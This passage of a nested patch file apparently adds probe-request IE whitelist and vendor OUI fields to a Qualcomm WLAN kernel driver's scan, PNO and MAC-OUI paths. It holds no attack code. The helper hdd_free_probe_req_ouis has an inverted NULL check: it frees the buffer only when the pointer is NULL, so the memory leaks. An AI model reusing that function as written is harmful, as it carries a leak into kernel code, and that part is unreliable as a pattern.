-+
-+	pHddCtx->probe_req_voui = (struct vendor_oui *)vos_mem_malloc(oui_indx *
-+						sizeof(struct vendor_oui));
-+	if (pHddCtx->probe_req_voui == NULL) {
-+		hddLog(LOGE,"Not Enough memory for OUI");
-+		pHddCtx->no_of_probe_req_ouis = 0;
-+		return VOS_STATUS_E_FAILURE;
-+	}
-+	vos_mem_zero(pHddCtx->probe_req_voui,
-+				oui_indx * sizeof(struct vendor_oui));
-+	pHddCtx->no_of_probe_req_ouis = oui_indx;
-+	vos_mem_copy(pHddCtx->probe_req_voui, voui,
-+				oui_indx * sizeof(struct vendor_oui));
-+
-+	return VOS_STATUS_SUCCESS;
-+}
-+
-+/**
-+ * hdd_free_probe_req_ouis - de-allocates the probe req ouis
-+ * @hdd_ctx: the pointer to hdd context
-+ *
-+ * This function de-alloactes the probe req ouis which are
-+ * allocated while parsing of ini string gProbeReqOUIs
-+ *
-+ * Return: None
-+ */
-+void hdd_free_probe_req_ouis(hdd_context_t* pHddCtx)
-+{
-+	if (!pHddCtx->probe_req_voui)
-+		vos_mem_free(pHddCtx->probe_req_voui);
-+
-+	pHddCtx->no_of_probe_req_ouis = 0;
-+}
-diff --git a/CORE/HDD/src/wlan_hdd_cfg80211.c b/CORE/HDD/src/wlan_hdd_cfg80211.c
-index b61bbdb..d51350e 100644
---- a/CORE/HDD/src/wlan_hdd_cfg80211.c
-+++ b/CORE/HDD/src/wlan_hdd_cfg80211.c
-@@ -1578,6 +1578,49 @@ wlan_hdd_cfg80211_get_supported_features(struct wiphy *wiphy,
- }
- 
- /**
-+ * wlan_hdd_fill_whitelist_ie_attrs - fill the white list members
-+ * @ie_whitelist: enables whitelist
-+ * @probe_req_ie_bitmap: bitmap to be filled
-+ * @num_vendor_oui: pointer to no of ouis
-+ * @voui: pointer to ouis to be filled
-+ * @pHddCtx: pointer to hdd ctx
-+ *
-+ * This function fills the ie bitmap and vendor oui fields with the
-+ * corresponding values present in cfg_ini and PHddCtx
-+ *
-+ * Return:   Return none
-+ */
-+static void wlan_hdd_fill_whitelist_ie_attrs(bool *ie_whitelist,
-+					     uint32_t *probe_req_ie_bitmap,
-+					     uint32_t *num_vendor_oui,
-+					     struct vendor_oui *voui,
-+					     hdd_context_t *pHddCtx)
-+{
-+	uint32_t i = 0;
-+
-+	*ie_whitelist = true;
-+	probe_req_ie_bitmap[0] = pHddCtx->cfg_ini->probe_req_ie_bitmap_0;
-+	probe_req_ie_bitmap[1] = pHddCtx->cfg_ini->probe_req_ie_bitmap_1;
-+	probe_req_ie_bitmap[2] = pHddCtx->cfg_ini->probe_req_ie_bitmap_2;
-+	probe_req_ie_bitmap[3] = pHddCtx->cfg_ini->probe_req_ie_bitmap_3;
-+	probe_req_ie_bitmap[4] = pHddCtx->cfg_ini->probe_req_ie_bitmap_4;
-+	probe_req_ie_bitmap[5] = pHddCtx->cfg_ini->probe_req_ie_bitmap_5;
-+	probe_req_ie_bitmap[6] = pHddCtx->cfg_ini->probe_req_ie_bitmap_6;
-+	probe_req_ie_bitmap[7] = pHddCtx->cfg_ini->probe_req_ie_bitmap_7;
-+
-+	*num_vendor_oui = 0;
-+
-+	if ((pHddCtx->no_of_probe_req_ouis != 0) && (voui != NULL)) {
-+		*num_vendor_oui = pHddCtx->no_of_probe_req_ouis;
-+		for (i = 0; i < pHddCtx->no_of_probe_req_ouis; i++) {
-+			voui[i].oui_type = pHddCtx->probe_req_voui[i].oui_type;
-+			voui[i].oui_subtype =
-+					pHddCtx->probe_req_voui[i].oui_subtype;
-+		}
-+	}
-+}
-+
-+/**
-  * __wlan_hdd_cfg80211_set_scanning_mac_oui() - set scan MAC
-  * @wiphy:   pointer to wireless wiphy structure.
-  * @wdev:    pointer to wireless_dev structure.
-@@ -1625,12 +1668,16 @@ __wlan_hdd_cfg80211_set_scanning_mac_oui(struct wiphy *wiphy,
-         return -EINVAL;
-     }
- 
--    pReqMsg = vos_mem_malloc(sizeof(*pReqMsg));
-+    pReqMsg = vos_mem_malloc(sizeof(*pReqMsg) +
-+                    (pHddCtx->no_of_probe_req_ouis) *
-+                    (sizeof(struct vendor_oui)));
-     if (!pReqMsg) {
-         hddLog(LOGE, FL("vos_mem_malloc failed"));
-         return -ENOMEM;
-     }
--    vos_mem_zero(pReqMsg, sizeof(*pReqMsg));
-+    vos_mem_zero(pReqMsg, sizeof(*pReqMsg) +
-+                    (pHddCtx->no_of_probe_req_ouis) *
-+                    (sizeof(struct vendor_oui)));
- 
-     /* Parse and fetch oui */
-     if (!tb[QCA_WLAN_VENDOR_ATTR_SET_SCANNING_MAC_OUI]) {
-@@ -1647,7 +1694,15 @@ __wlan_hdd_cfg80211_set_scanning_mac_oui(struct wiphy *wiphy,
-     pReqMsg->enb_probe_req_sno_randomization = 1;
- 
-     hddLog(LOG1, FL("Oui (%02x:%02x:%02x), vdev_id = %d"), pReqMsg->oui[0],
--                    pReqMsg->oui[1], pReqMsg->oui[2], pReqMsg->vdev_id);
-+                     pReqMsg->oui[1], pReqMsg->oui[2], pReqMsg->vdev_id);
-+
-+    if (pHddCtx->cfg_ini->probe_req_ie_whitelist)
-+         wlan_hdd_fill_whitelist_ie_attrs(&pReqMsg->ie_whitelist,
-+                                      pReqMsg->probe_req_ie_bitmap,
-+                                      &pReqMsg->num_vendor_oui,
-+                                      (struct vendor_oui *)((uint8_t *)pReqMsg +
-+                                      sizeof(*pReqMsg)),
-+                                      pHddCtx);
- 
-     status = sme_SetScanningMacOui(pHddCtx->hHal, pReqMsg);
-     if (!HAL_STATUS_SUCCESS(status)) {
-@@ -18805,6 +18860,25 @@ int __wlan_hdd_cfg80211_scan( struct wiphy *wiphy,
-     wlan_hdd_update_scan_rand_attrs((void *)&scanRequest, (void *)request,
-                                     WLAN_HDD_HOST_SCAN);
- 
-+    if (pHddCtx->no_of_probe_req_ouis != 0) {
-+        scanRequest.voui = (struct vendor_oui *)vos_mem_malloc(
-+                                              pHddCtx->no_of_probe_req_ouis *
-+                                              sizeof(struct vendor_oui));
-+        if (!scanRequest.voui) {
-+            hddLog(LOGE, FL("Not enough memory for voui"));
-+            scanRequest.num_vendor_oui = 0;
-+            status = -ENOMEM;
-+            goto free_mem;
-+        }
-+    }
-+
-+    if (pHddCtx->cfg_ini->probe_req_ie_whitelist)
-+        wlan_hdd_fill_whitelist_ie_attrs(&scanRequest.ie_whitelist,
-+                                         scanRequest.probe_req_ie_bitmap,
-+                                         &scanRequest.num_vendor_oui,
-+                                         scanRequest.voui,
-+                                         pHddCtx);
-+
-     vos_runtime_pm_prevent_suspend(pHddCtx->runtime_context.scan);
-     status = sme_ScanRequest( WLAN_HDD_GET_HAL_CTX(pAdapter),
-                               pAdapter->sessionId, &scanRequest, &scanId,
-@@ -18846,6 +18920,9 @@ free_mem:
-     if( channelList )
-       vos_mem_free( channelList );
- 
-+    if(scanRequest.voui)
-+        vos_mem_free(scanRequest.voui);
-+
-     EXIT();
-     return status;
- }
-@@ -22819,7 +22896,9 @@ static int __wlan_hdd_cfg80211_sched_scan_start(struct wiphy *wiphy,
-         return -ENOTSUPP;
-     }
- 
--    pPnoRequest = (tpSirPNOScanReq) vos_mem_malloc(sizeof (tSirPNOScanReq));
-+    pPnoRequest = (tpSirPNOScanReq) vos_mem_malloc(sizeof(tSirPNOScanReq) +
-+                                    (pHddCtx->no_of_probe_req_ouis) *
-+                                    (sizeof(struct vendor_oui)));
-     if (NULL == pPnoRequest)
-     {
-         VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_FATAL,
-@@ -22827,7 +22906,9 @@ static int __wlan_hdd_cfg80211_sched_scan_start(struct wiphy *wiphy,
-         return -ENOMEM;
-     }
- 
--    memset(pPnoRequest, 0, sizeof (tSirPNOScanReq));
-+    memset(pPnoRequest, 0, sizeof (tSirPNOScanReq) +
-+                           (pHddCtx->no_of_probe_req_ouis) *
-+                           (sizeof(struct vendor_oui)));
-     pPnoRequest->enable = 1; /*Enable PNO */
-     pPnoRequest->ucNetworksCount = request->n_match_sets;
-     if ((!pPnoRequest->ucNetworksCount ) ||
-@@ -22985,6 +23066,15 @@ static int __wlan_hdd_cfg80211_sched_scan_start(struct wiphy *wiphy,
-     wlan_hdd_update_scan_rand_attrs((void *)pPnoRequest, (void *)request,
-                                     WLAN_HDD_PNO_SCAN);
- 
-+    if (pHddCtx->cfg_ini->probe_req_ie_whitelist)
-+        wlan_hdd_fill_whitelist_ie_attrs(&pPnoRequest->ie_whitelist,
-+                                         pPnoRequest->probe_req_ie_bitmap,
-+                                         &pPnoRequest->num_vendor_oui,
-+                                         (struct vendor_oui *)(
-+                                         (uint8_t *)pPnoRequest +
-+                                         sizeof(*pPnoRequest)),
-+                                         pHddCtx);
-+
-     status = sme_SetPreferredNetworkList(WLAN_HDD_GET_HAL_CTX(pAdapter),
-                               pPnoRequest, pAdapter->sessionId,
-                               hdd_cfg80211_sched_scan_done_callback, pAdapter);
-diff --git a/CORE/HDD/src/wlan_hdd_main.c b/CORE/HDD/src/wlan_hdd_main.c
-index 9a1922b..b967a67 100644
---- a/CORE/HDD/src/wlan_hdd_main.c
-+++ b/CORE/HDD/src/wlan_hdd_main.c
-@@ -13334,6 +13334,7 @@ free_hdd_ctx:
- 
-    wlan_hdd_deinit_chan_info(pHddCtx);
-    wlan_hdd_deinit_tx_rx_histogram(pHddCtx);
-+   hdd_free_probe_req_ouis(pHddCtx);
-    wiphy_unregister(wiphy) ;
-    wlan_hdd_cfg80211_deinit(wiphy);
-    wiphy_free(wiphy) ;
-@@ -14926,6 +14927,27 @@ int hdd_wlan_startup(struct device *dev, v_VOID_t *hif_sc)
-    if (!hdd_ipa_is_present(pHddCtx))
-       hdd_ipa_reset_ipaconfig(pHddCtx, 0);
- 
-+   if (pHddCtx->cfg_ini->probe_req_ie_whitelist)
-+   {
-+      if (hdd_validate_prb_req_ie_bitmap(pHddCtx))
-+      {
-+         /* parse ini string probe req oui */
-+         status = hdd_parse_probe_req_ouis(pHddCtx);
-+         if (VOS_STATUS_SUCCESS != status)
-+         {
-+            hddLog(LOGE, FL("Error parsing probe req ouis - Ignoring them"
-+                            " disabling white list"));
-+            pHddCtx->cfg_ini->probe_req_ie_whitelist = false;
-+         }
-+      }
-+      else
-+      {
-+         hddLog(LOGE, FL("invalid probe req ie bitmap and ouis,"
-+                         " disabling white list"));
-+         pHddCtx->cfg_ini->probe_req_ie_whitelist = false;
-+      }
-+   }
-+
-    if (0 == pHddCtx->cfg_ini->max_go_peers)
-       pHddCtx->cfg_ini->max_go_peers = pHddCtx->cfg_ini->max_sap_peers;
- 
-@@ -15944,8 +15966,10 @@ err_histogram:
- 
- err_free_hdd_context:
-    /* wiphy_free() will free the HDD context so remove global reference */
--   if (pVosContext)
-+   if (pVosContext) {
-+      hdd_free_probe_req_ouis(pHddCtx);
-       ((VosContextType*)(pVosContext))->pHDDContext = NULL;
-+   }
- 
-    wiphy_free(wiphy) ;
-    //kfree(wdev) ;
-diff --git a/CORE/MAC/inc/sirApi.h b/CORE/MAC/inc/sirApi.h
-index 83d53be..36f71b6 100644
---- a/CORE/MAC/inc/sirApi.h
-+++ b/CORE/MAC/inc/sirApi.h
-@@ -89,6 +89,7 @@ typedef tANI_U8 tSirVersionString[SIR_VERSION_STRING_LEN];
- #define MAXNUM_PERIODIC_TX_PTRNS 6
- 
- #define WIFI_SCANNING_MAC_OUI_LENGTH 3
-+#define PROBE_REQ_BITMAP_LEN 8
- 
- #define MAX_LEN_UDP_RESP_OFFLOAD 128
- 
-@@ -945,6 +946,11 @@ typedef struct sSirSmeScanReq
-     uint32_t enable_scan_randomization;
-     uint8_t mac_addr[VOS_MAC_ADDR_SIZE];
-     uint8_t mac_addr_mask[VOS_MAC_ADDR_SIZE];
-+    bool ie_whitelist;
-+    uint32_t probe_req_ie_bitmap[PROBE_REQ_BITMAP_LEN];
-+    uint32_t num_vendor_oui;
-+    uint32_t oui_field_len;
-+    uint32_t oui_field_offset;
- 
-     //channelList MUST be the last field of this structure
-     tSirChannelList channelList;
-@@ -964,7 +970,10 @@ typedef struct sSirSmeScanReq
-       ----------------------------- <--+
-       ... variable size uIEFiled
-       up to uIEFieldLen (can be 0)
--      -----------------------------*/
-+      -----------------------------
-+      ... variable size upto num_vendor_oui
-+      struct vendor_oui voui;
-+    */
- } tSirSmeScanReq, *tpSirSmeScanReq;
- 
- typedef struct sSirSmeScanAbortReq
-@@ -3810,6 +3819,10 @@ typedef struct sSirPNOScanReq {
- 	uint32_t enable_pno_scan_randomization;
- 	uint8_t mac_addr[VOS_MAC_ADDR_SIZE];
- 	uint8_t mac_addr_mask[VOS_MAC_ADDR_SIZE];
-+	bool ie_whitelist;
-+	uint32_t probe_req_ie_bitmap[PROBE_REQ_BITMAP_LEN];
-+	uint32_t num_vendor_oui;
-+	/* followed by one or more struct vendor_oui */
- } tSirPNOScanReq, *tpSirPNOScanReq;
- 
- typedef struct sSirSetRSSIFilterReq
-@@ -4536,6 +4549,11 @@ typedef struct sSirScanOffloadReq {
-     uint32_t enable_scan_randomization;
-     uint8_t mac_addr[VOS_MAC_ADDR_SIZE];
-     uint8_t mac_addr_mask[VOS_MAC_ADDR_SIZE];
-+    bool ie_whitelist;
-+    uint32_t probe_req_ie_bitmap[PROBE_REQ_BITMAP_LEN];
-+    uint32_t num_vendor_oui;
-+    uint32_t oui_field_len;
-+    uint32_t oui_field_offset;
- 
-     tSirChannelList channelList;
-     /*-----------------------------
-@@ -4554,7 +4572,10 @@ typedef struct sSirScanOffloadReq {
-       ----------------------------- <--+
-       ... variable size uIEField
-       up to uIEFieldLen (can be 0)
--      -----------------------------*/
-+      -----------------------------
-+      ... variable size upto num_vendor_oui
-+      struct vendor_oui voui;
-+      ------------------------*/
- } tSirScanOffloadReq, *tpSirScanOffloadReq;
- 
- /**
-@@ -5823,11 +5844,25 @@ typedef struct
-   tANI_U8   stopReq;
- } tSirLLStatsClearReq, *tpSirLLStatsClearReq;
- 
-+/**
-+ * struct vendor_oui - probe request ie vendor oui information
-+ * @oui_type: type of the vendor oui (3 valid octets)
-+ * @oui_subtype: subtype of the vendor oui (1 valid octet)
-+ */
-+struct vendor_oui {
-+	uint32_t oui_type;
-+	uint32_t oui_subtype;
-+};
-+
- typedef struct
- {
-     tANI_U8 oui[WIFI_SCANNING_MAC_OUI_LENGTH];
-     uint32_t vdev_id;
-     uint32_t enb_probe_req_sno_randomization;
-+    bool ie_whitelist;
-+    uint32_t probe_req_ie_bitmap[PROBE_REQ_BITMAP_LEN];
-+    uint32_t num_vendor_oui;
-+    /* Followed by 0 or more struct vendor_oui */
- } tSirScanMacOui, *tpSirScanMacOui;
- 
- enum {
-diff --git a/CORE/MAC/src/pe/lim/limProcessSmeReqMessages.c b/CORE/MAC/src/pe/lim/limProcessSmeReqMessages.c
-index a6a7879..d1629bc 100644
---- a/CORE/MAC/src/pe/lim/limProcessSmeReqMessages.c
-+++ b/CORE/MAC/src/pe/lim/limProcessSmeReqMessages.c
-@@ -1233,7 +1233,7 @@ static eHalStatus limSendHalStartScanOffloadReq(tpAniSirGlobal pMac,
-     /* The tSirScanOffloadReq will reserve the space for first channel,
-        so allocate the memory for (numChannels - 1) and uIEFieldLen */
-     len = sizeof(tSirScanOffloadReq) + (pScanReq->channelList.numChannels - 1) +
--        pScanReq->uIEFieldLen;
-+        pScanReq->uIEFieldLen + pScanReq->oui_field_len;
- 
-     if (!pMac->per_band_chainmask_supp) {
-         if (IS_DOT11_MODE_HT(pScanReq->dot11mode)) {
-@@ -1332,7 +1332,8 @@ static eHalStatus limSendHalStartScanOffloadReq(tpAniSirGlobal pMac,
- 
-     pScanOffloadReq->uIEFieldLen = pScanReq->uIEFieldLen;
-     pScanOffloadReq->uIEFieldOffset = len - addn_ie_len -
--                                      pScanOffloadReq->uIEFieldLen;
-+                                      pScanOffloadReq->uIEFieldLen -
-+                                      pScanReq->oui_field_len;
-     vos_mem_copy(
-             (tANI_U8 *) pScanOffloadReq + pScanOffloadReq->uIEFieldOffset,
-             (tANI_U8 *) pScanReq + pScanReq->uIEFieldOffset,
-@@ -1395,6 +1396,23 @@ static eHalStatus limSendHalStartScanOffloadReq(tpAniSirGlobal pMac,
-                      VOS_MAC_ADDR_SIZE);
-     }
- 
-+    pScanOffloadReq->oui_field_len = pScanReq->oui_field_len;
-+    pScanOffloadReq->num_vendor_oui = pScanReq->num_vendor_oui;
-+    pScanOffloadReq->ie_whitelist = pScanReq->ie_whitelist;
-+    if (pScanOffloadReq->ie_whitelist)
-+        vos_mem_copy(pScanOffloadReq->probe_req_ie_bitmap,
-+                     pScanReq->probe_req_ie_bitmap,
-+                     PROBE_REQ_BITMAP_LEN * sizeof(uint32_t));
-+    pScanOffloadReq->oui_field_offset = sizeof(tSirScanOffloadReq) +
-+                               (pScanOffloadReq->channelList.numChannels - 1) +
-+                               pScanOffloadReq->uIEFieldLen;
-+    if (pScanOffloadReq->num_vendor_oui != 0) {
-+        vos_mem_copy(
-+            (tANI_U8 *) pScanOffloadReq + pScanOffloadReq->oui_field_offset,
-+            (uint8_t *) pScanReq + pScanReq->oui_field_offset,
-+            pScanReq->oui_field_len);
-+    }
-+
-     rc = wdaPostCtrlMsg(pMac, &msg);
-     if (rc != eSIR_SUCCESS)
-     {
-diff --git a/CORE/SERVICES/WMA/wma.c b/CORE/SERVICES/WMA/wma.c
-index c89f31b..e24b0e6 100644
---- a/CORE/SERVICES/WMA/wma.c
-+++ b/CORE/SERVICES/WMA/wma.c
-@@ -9884,6 +9884,8 @@ VOS_STATUS wma_get_buf_start_scan_cmd(tp_wma_handle wma_handle,
- 	u_int8_t SSID_num;
- 	int i;
- 	int len = sizeof(*cmd);
-+	wmi_vendor_oui *voui = NULL;
-+	struct vendor_oui *pvoui = NULL;
- 	tpAniSirGlobal pMac = (tpAniSirGlobal )vos_get_context(VOS_MODULE_ID_PE,
- 				wma_handle->vos_context);
- 
-@@ -9908,6 +9910,10 @@ VOS_STATUS wma_get_buf_start_scan_cmd(tp_wma_handle wma_handle,
- 	if (scan_req->uIEFieldLen)
- 		len += roundup(scan_req->uIEFieldLen, sizeof(u_int32_t));
- 
-+	len += WMI_TLV_HDR_SIZE; /* Length of TLV for array of wmi_vendor_oui */
-+	if (scan_req->num_vendor_oui)
-+		len += scan_req->num_vendor_oui * sizeof(wmi_vendor_oui);
-+
- 	/* Allocate the memory */
- 	*buf = wmi_buf_alloc(wma_handle->wmi_handle, len);
-         if (!*buf) {
-@@ -10010,8 +10016,19 @@ VOS_STATUS wma_get_buf_start_scan_cmd(tp_wma_handle wma_handle,
- 		WMI_CHAR_ARRAY_TO_MAC_ADDR(scan_req->mac_addr_mask,
- 						&cmd->mac_mask);
- 	}
-+	if (scan_req->ie_whitelist)
-+		cmd->scan_ctrl_flags |=
-+				WMI_SCAN_ENABLE_IE_WHTELIST_IN_PROBE_REQ;
-+
- 	WMA_LOGI("scan_ctrl_flags = %x", cmd->scan_ctrl_flags);
- 
-+	if (scan_req->ie_whitelist) {
-+		for (i = 0; i < PROBE_REQ_BITMAP_LEN; i++)
-+			cmd->ie_bitmap[i] = scan_req->probe_req_ie_bitmap[i];
-+	}
-+
-+	cmd->num_vendor_oui = scan_req->num_vendor_oui;
-+
- 	if (!scan_req->p2pScanType) {
- 		WMA_LOGD("Normal Scan request");
- 		cmd->scan_ctrl_flags |= WMI_SCAN_ADD_CCK_RATES;
-@@ -10233,6 +10250,29 @@ VOS_STATUS wma_get_buf_start_scan_cmd(tp_wma_handle wma_handle,
- 	}
- 	buf_ptr += WMI_TLV_HDR_SIZE + ie_len_with_pad;
- 
-+	/* mac randomization */
-+	WMITLV_SET_HDR(buf_ptr, WMITLV_TAG_ARRAY_STRUC,
-+		       scan_req->num_vendor_oui *
-+		       sizeof(wmi_vendor_oui));
-+
-+	buf_ptr += WMI_TLV_HDR_SIZE;
-+
-+	if (cmd->num_vendor_oui != 0) {
-+		voui = (wmi_vendor_oui *)buf_ptr;
-+		pvoui = (struct vendor_oui *)((u_int8_t *)scan_req +
-+			(scan_req->oui_field_offset));
-+		for (i = 0; i < cmd->num_vendor_oui; i++) {
-+			WMITLV_SET_HDR(&voui[i].tlv_header,
-+				WMITLV_TAG_STRUC_wmi_vendor_oui,
-+				WMITLV_GET_STRUCT_TLVLEN(
-+				wmi_vendor_oui));
-+			voui[i].oui_type_subtype = pvoui[i].oui_type |
-+						(pvoui[i].oui_subtype << 24);
-+		}
-+		buf_ptr += cmd->num_vendor_oui *
-+				sizeof(wmi_vendor_oui);
-+	}
-+
- 	*buf_len = len;
- 	return VOS_STATUS_SUCCESS;
- error:
-@@ -20530,17 +20570,24 @@ static VOS_STATUS wma_pno_start(tp_wma_handle wma, tpSirPNOScanReq pno)
- 	u_int8_t *buf_ptr;
- 	u_int8_t i;
- 	int ret;
-+	wmi_vendor_oui *voui = NULL;
-+	struct vendor_oui *pvoui = NULL;
- 
- 	WMA_LOGD("PNO Start");
- 
- 	len = sizeof(*cmd) +
- 	      WMI_TLV_HDR_SIZE + /* TLV place holder for array of structures nlo_configured_parameters(nlo_list) */
--	      WMI_TLV_HDR_SIZE; /* TLV place holder for array of uint32 channel_list */
-+	      WMI_TLV_HDR_SIZE + /* TLV place holder for array of uint32 channel_list */
-+	      WMI_TLV_HDR_SIZE + /* TLV of nlo_channel_prediction_cfg */
-+	      WMI_TLV_HDR_SIZE; /* array of wmi_vendor_oui */
- 
- 	len += sizeof(u_int32_t) * MIN(pno->aNetworks[0].ucChannelCount,
- 				   WMI_NLO_MAX_CHAN);
- 	len += sizeof(nlo_configured_parameters) *
- 				MIN(pno->ucNetworksCount, WMI_NLO_MAX_SSIDS);
-+	/* Add the fixed length of enlo_candidate_score_params */
-+	len += sizeof(enlo_candidate_score_params);
-+	len += sizeof(wmi_vendor_oui) * pno->num_vendor_oui;
- 
- 	buf = wmi_buf_alloc(wma->wmi_handle, len);
- 	if (!buf) {
-@@ -20578,8 +20625,19 @@ static VOS_STATUS wma_pno_start(tp_wma_handle wma, tpSirPNOScanReq pno)
- 		WMI_CHAR_ARRAY_TO_MAC_ADDR(pno->mac_addr, &cmd->mac_addr);
- 		WMI_CHAR_ARRAY_TO_MAC_ADDR(pno->mac_addr_mask, &cmd->mac_mask);
- 	}
-+
-+	if (pno->ie_whitelist)
-+		cmd->flags |= WMI_NLO_CONFIG_ENABLE_IE_WHITELIST_IN_PROBE_REQ;
-+
- 	WMA_LOGI("pno flags = %x", cmd->flags);
- 
-+	cmd->num_vendor_oui = pno->num_vendor_oui;
-+
-+	if (pno->ie_whitelist) {
-+		for (i = 0; i < PROBE_REQ_BITMAP_LEN; i++)
-+			cmd->ie_bitmap[i] = pno->probe_req_ie_bitmap[i];
-+	}
-+
- 	buf_ptr += sizeof(wmi_nlo_config_cmd_fixed_param);
- 
- 	cmd->no_of_ssids = MIN(pno->ucNetworksCount, WMI_NLO_MAX_SSIDS);
-@@ -20640,6 +20698,37 @@ static VOS_STATUS wma_pno_start(tp_wma_handle wma, tpSirPNOScanReq pno)
- 	}
- 	buf_ptr += cmd->num_of_channels * sizeof(u_int32_t);
- 
-+	/*
-+	 * For pno start, this is not needed but to get the correct offset of
-+	 * wmi_vendor_oui, this is needed
-+	 */
-+	WMITLV_SET_HDR(buf_ptr, WMITLV_TAG_ARRAY_STRUC, 0);
-+	buf_ptr += WMI_TLV_HDR_SIZE; /* zero no.of nlo_channel_prediction_cfg */
-+	WMITLV_SET_HDR(buf_ptr, WMITLV_TAG_STRUC_enlo_candidate_score_param,
-+			WMITLV_GET_STRUCT_TLVLEN(enlo_candidate_score_params));
-+	buf_ptr += sizeof(enlo_candidate_score_params);
-+
-+	/* ie white list */
-+	WMITLV_SET_HDR(buf_ptr, WMITLV_TAG_ARRAY_STRUC,
-+		       pno->num_vendor_oui *
-+		       sizeof(wmi_vendor_oui));
-+
-+	buf_ptr += WMI_TLV_HDR_SIZE;
-+
-+	if (cmd->num_vendor_oui != 0) {
-+		voui = (wmi_vendor_oui *)buf_ptr;
-+		pvoui = (struct vendor_oui *)((uint8_t *)pno + sizeof(*pno));
-+		for (i = 0; i < cmd->num_vendor_oui; i++) {
-+			WMITLV_SET_HDR(&voui[i].tlv_header,
-+				WMITLV_TAG_STRUC_wmi_vendor_oui,
-+				WMITLV_GET_STRUCT_TLVLEN(
-+				wmi_vendor_oui));
-+			voui[i].oui_type_subtype = pvoui[i].oui_type |
-+						(pvoui[i].oui_subtype << 24);
-+		}
-+		buf_ptr += cmd->num_vendor_oui * sizeof(wmi_vendor_oui);
-+	}
-+
- 	/* TODO: Discrete firmware doesn't have command/option to configure
- 	 * App IE which comes from wpa_supplicant as of part PNO start request.
- 	 */
-@@ -29358,13 +29447,17 @@ VOS_STATUS  wma_scan_probe_setoui(tp_wma_handle wma,
- 	uint32_t   len;
- 	u_int8_t *buf_ptr;
- 	u_int32_t *oui_buf;
-+	uint32_t i = 0;
-+	wmi_vendor_oui *voui = NULL;
-+	struct vendor_oui *pvoui = NULL;
- 
- 	if (!wma || !wma->wmi_handle) {
- 		WMA_LOGE("%s: WMA is closed, can not issue  cmd",
- 			__func__);
- 		return VOS_STATUS_E_INVAL;
- 	}
--	len  = sizeof(*cmd);
-+	len  = sizeof(*cmd) + WMI_TLV_HDR_SIZE +
-+               psetoui->num_vendor_oui * sizeof(wmi_vendor_oui);
- 	wmi_buf = wmi_buf_alloc(wma->wmi_handle, len);
- 	if (!wmi_buf) {
- 		WMA_LOGE("%s: wmi_buf_alloc failed", __func__);
-@@ -29388,8 +29481,39 @@ VOS_STATUS  wma_scan_probe_setoui(tp_wma_handle wma,
- 	cmd->flags = WMI_SCAN_PROBE_OUI_SPOOFED_MAC_IN_PROBE_REQ;
- 	if (psetoui->enb_probe_req_sno_randomization)
- 		cmd->flags |= WMI_SCAN_PROBE_OUI_RANDOM_SEQ_NO_IN_PROBE_REQ;
-+
-+	if (psetoui->ie_whitelist)
-+		cmd->flags |=
-+			WMI_SCAN_PROBE_OUI_ENABLE_IE_WHITELIST_IN_PROBE_REQ;
-+
- 	WMA_LOGI(FL("vdev_id = %d, flags = %x"), cmd->vdev_id, cmd->flags);
- 
-+	cmd->num_vendor_oui = psetoui->num_vendor_oui;
-+
-+	if (psetoui->ie_whitelist) {
-+		for (i = 0; i < PROBE_REQ_BITMAP_LEN; i++)
-+			cmd->ie_bitmap[i] = psetoui->probe_req_ie_bitmap[i];
-+	}
-+
-+	buf_ptr += sizeof(*cmd);
-+	WMITLV_SET_HDR(buf_ptr, WMITLV_TAG_ARRAY_STRUC,
-+		       psetoui->num_vendor_oui *
-+		       sizeof(wmi_vendor_oui));
-+
-+	buf_ptr += WMI_TLV_HDR_SIZE;
-+	if (cmd->num_vendor_oui != 0) {
-+		voui = (wmi_vendor_oui *)buf_ptr;
-+		pvoui = (struct vendor_oui *)((u_int8_t *)psetoui +
-+						sizeof(*psetoui));
-+		for (i = 0; i < cmd->num_vendor_oui; i++) {
-+			WMITLV_SET_HDR(&voui[i].tlv_header,
-+				WMITLV_TAG_STRUC_wmi_vendor_oui,
-+				WMITLV_GET_STRUCT_TLVLEN(
-+				wmi_vendor_oui));
-+			voui[i].oui_type_subtype = pvoui[i].oui_type |
-+						(pvoui[i].oui_subtype << 24);
-+		}
-+	}
- 
- 	if (wmi_unified_cmd_send(wma->wmi_handle, wmi_buf, len,
- 		WMI_SCAN_PROB_REQ_OUI_CMDID)) {
-diff --git a/CORE/SME/inc/csrApi.h b/CORE/SME/inc/csrApi.h
-index 5c03abe..a1606fe 100644
---- a/CORE/SME/inc/csrApi.h
-+++ b/CORE/SME/inc/csrApi.h
-@@ -314,6 +314,10 @@ typedef struct tagCsrScanRequest
-     uint32_t enable_scan_randomization;
-     uint8_t mac_addr[VOS_MAC_ADDR_SIZE];
-     uint8_t mac_addr_mask[VOS_MAC_ADDR_SIZE];
-+    bool ie_whitelist;
-+    uint32_t probe_req_ie_bitmap[PROBE_REQ_BITMAP_LEN];
-+    uint32_t num_vendor_oui;
-+    struct vendor_oui *voui;
- }tCsrScanRequest;
- 
- typedef struct tagCsrBGScanRequest
-diff --git a/CORE/SME/src/csr/csrApiScan.c b/CORE/SME/src/csr/csrApiScan.c
-index 37e5a0f..65a8dc4 100644
---- a/CORE/SME/src/csr/csrApiScan.c
-+++ b/CORE/SME/src/csr/csrApiScan.c
-@@ -5827,7 +5827,8 @@ eHalStatus csrSendMBScanReq( tpAniSirGlobal pMac, tANI_U16 sessionId,
- 
-     msgLen = (tANI_U16)(sizeof( tSirSmeScanReq ) - sizeof( pMsg->channelList.channelNumber ) +
-                         ( sizeof( pMsg->channelList.channelNumber ) * pScanReq->ChannelInfo.numOfChannels )) +
--                   ( pScanReq->uIEFieldLen ) ;
-+                   ( pScanReq->uIEFieldLen ) +
-+                   pScanReq->num_vendor_oui * sizeof(struct vendor_oui);
- 
-     pMsg = vos_mem_malloc(msgLen);
-     if ( NULL == pMsg )
-@@ -5999,6 +6000,28 @@ eHalStatus csrSendMBScanReq( tpAniSirGlobal pMac, tANI_U16 sessionId,
-                 vos_mem_copy(pMsg->mac_addr_mask, pScanReq->mac_addr_mask,
-                              VOS_MAC_ADDR_SIZE);
-             }
-+
-+            pMsg->ie_whitelist = pScanReq->ie_whitelist;
-+            if (pMsg->ie_whitelist)
-+                vos_mem_copy(pMsg->probe_req_ie_bitmap,
-+                             pScanReq->probe_req_ie_bitmap,
-+                             PROBE_REQ_BITMAP_LEN * sizeof(uint32_t));
-+            pMsg->num_vendor_oui = pScanReq->num_vendor_oui;
-+            pMsg->oui_field_len = pScanReq->num_vendor_oui *
-+                                  sizeof(struct vendor_oui);
